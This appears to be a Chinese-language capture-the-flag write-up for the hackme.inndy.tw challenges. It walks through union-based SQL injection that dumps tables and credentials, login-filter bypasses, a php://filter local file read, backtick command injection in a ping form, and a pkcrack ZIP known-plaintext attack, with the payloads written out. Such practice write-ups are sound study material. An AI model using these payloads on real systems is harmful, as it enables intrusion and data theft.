web
homepage
打开链接 看console ,发现二维码,得到
1 | flag FLAG{Oh, You found me!!!!!! Yeeeeeeee.} |
hide and seek
看源代码
1 | FLAG{0h U C meeeeeeeeeeeeeeeeeeee!} |
guestbook
new post 后 ,查看 message list 时,发现url=https://hackme.inndy.tw/gb/?mod=read&id=13197
而id 部分猜测有sql注入漏洞。
在尝试 id=13197 order by 5 时 refererror 确定字段数为4。
1 | ?mod=read&id=0 union select 2,2,2, group_concat(table_name) from information_schema.tables where table_schema=database() |
flag,posts,users
1 | id=0 union select 2,2,2, group_concat(column_name) from information_schema.columns where table_name="flag" |
id,flag,padding0,padding1
1 | id=0 union select 2,2,2, group_concat(flag) from flag |
flag
1 | FLAG{Y0U_KN0W_SQL_1NJECT10N!!!' or 595342>123123#} |
LFI
基本知识
推荐阅读1
推荐阅读2
tips:LFI, php://filter
谁便打开,观察url 在pages下https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag
得Can you read the flag<?php require('config.php'); ?>?
在读
1 | $flag = "FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}"; |
ping
1 | $blacklist = [ |
无反引号 \`ls`\
ping: flag.php
index.php: Name or service not known
\`sort ????????`\
1 | ping: $flag = 'FLAG{ping_$(capture-the-flag)_UtUbtnvY5F9Hn5dR}'; |
scoreboard
抓包
看 Response
得
1 | FLAG{Header can hide some data aswell.} |
login0
先看代码
重点
1 | function safe_filter($str) |
1 | $sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'", |
1 | name=admin\' ||1=1 -- &password=guest |
response
Hi, guest
You are not admin!
1 | name=admin\' ||1=1 limit 1,10 -- &password=guest |
flag
Hi, admin
You are admin!
1 | FLAG{\' UNION SELECT "I Know SQL Injection" #}, flag2 in the database! |
login as admin 0.1
上题的答案给了提示
flag2 in the database
1 | name=admin\' union select 1,database(),3,4#&password=a |
database()
login_as_admin0>
1 | name=admin\' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3,4#&password=a |
table
h1dden_f14g,user
limit 1,1可以得到其他表名
1 | name=admin\' union select 1,(select column_name from information_schema.columns where table_name="h1dden_f14g" limit 0,1),3,4#&password=a |
column_name
the_f14g
1 | name=admin\' union select 1,(select group_concat(the_f14g) from h1dden_f14g limit 0,1),3,4#&password=a |
flag
1 | Hi, FLAG{Good, Union select is quite easy to exploit!} |
user
-> id
->1,2,3
-> user
->guest,admin,inndy
-> password
->Hi, guest,password length is the key to secure your system,meow~i am not admin
login as admin 1.0
1 | $strl = strtolower($str); |
name=admin\'/**/UNion/**/select/**/1,2,3,4#&password=1
空格可以用/**/替代 , union/**/select -> union select , select/**/ -> select
得到flag
1 | FLAG{He110, Admin\\' or 1337 < 314159 #}, flag2 in the database! |
misc
flag
Description
1 | FLAG{This is flag's format} |
corgi-can-fly
没有给多余提示,猜测是隐写 利用StegSolve tool 在Red plane 0 得到二维码
1 | FLAG{Corgi is cutest aniaml on the earth >////////<} |
television
利用hexdump -c television.bmp
可得
1 | FLAG{PuRe_R@ND0M_DaTa_Fr0M/D3V/UR@ND0M} |
meow
利用binwalk 发现存在zip文件
再利用foremost 提取文件 发现zip加密
0000 发现不是zip伪加密
,且图片与之前的分割的图片一样,zip加密的明文攻击。
一开始,先想用ARCHPR来明文,但一直报错,改用kali pkcrack
推荐阅读kali可能不自带pkcrack
zip plain.zip 00000000.png
1 | ./pkcrack -C 00000094.zip -c meow/t39.1997-6/p296x100/10173502_279586372215628_1950740854_n.png -P plain.zip -p 00000000.png -d flag.zip -a |
flag
1 | FLAG{pkcrack is your frien. MEOW, MEOW, MEOW~} |
where is flag
tips :regular expression (正则表达式)
就是让你来找flag
regular expression.py
1 | # -*- coding: UTF-8 -*- |
1 | FLAG{VizQLeu9M3aybJBA3f1AgFROGyuTLXZ2oeRbKf1Agf1AgFLAG9hBTI} |
Crypto
easy
r u kidding
1 | EKZF{Hs'r snnn dzrx, itrs bzdrzq bhogdq} |
凯撒
1 | FLAG{It's tooo easy, just caesar cipher} |
easy
1 | import binascii |
1 | FLAG{This is easy, right?} |